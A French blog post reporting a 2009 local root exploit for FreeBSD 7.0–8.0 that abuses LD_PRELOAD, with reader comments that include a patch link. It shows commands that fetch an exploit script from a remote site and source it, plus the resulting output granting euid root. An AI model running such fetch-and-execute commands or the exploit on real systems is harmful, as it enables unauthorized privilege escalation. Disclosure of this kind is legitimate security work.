Local Root Exploit : FreeBSD LD_PRELOAD Security Bypass
Une faille critique vient d'être découverte dans le noyau de FreeBSD en version 7.0, 7.1 et 8.0. Cette dernière est à prendre très au sérieux étant donnée qu'elle permet à un simple utilisateur d'obtenir les privilèges root sur une machine.
Voici un exemple d'utilisation de l'exploit :
# fetch www.tux-planet.fr/public/hack/exploits/kernel/freebsd-8-local-root-exploit.sh
# source freebsd-8-local-root-exploit.sh
...
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
Ce qui donne par la suite :
# id
uid=1001(user) gid=1001(users) euid=0(root) groups=1001(users)
La faille de sécurité se situe au niveau de LD_PRELOAD, une variable d'environnement qui permet de spécifier les bibliothèques qui seront chargée au démarrage d'un programme. Avec un comportement normal, LD_PRELOAD empêche le chargement de binaire, ce qui n'est as le cas dans l'exploit utilisé ici.
4 Commentaires pour "Local Root Exploit : FreeBSD LD_PRELOAD Security Bypass"
Flux des commentaires de cet article Ajouter un commentaireHum miam
Le patch : http://docs.freebsd.org/cgi/getmsg.cgi?fetch=0+0+current/freebsd-announce
C'est moi ou tux-planet.fr se met au haking depuis quelques temps?
Ca n'est pas un mal c'est fun est on apprend beaucoup. Et puis tout les informaticiens ou leur période "hackeur", ca part, puis ca revient, ca me rappelle le bon temps faudrait que je m'y remette!
@Jérôme M. : ils ont réagi très vite pour nous sortir un patch !
@bibitte : pas plus qu'avant. Regarde la section Sécurité, les articles, tu verras que ça fait longtemps que je m'intéresse à ce domaine ...
@pti-seb : Ils sont toujours au taquet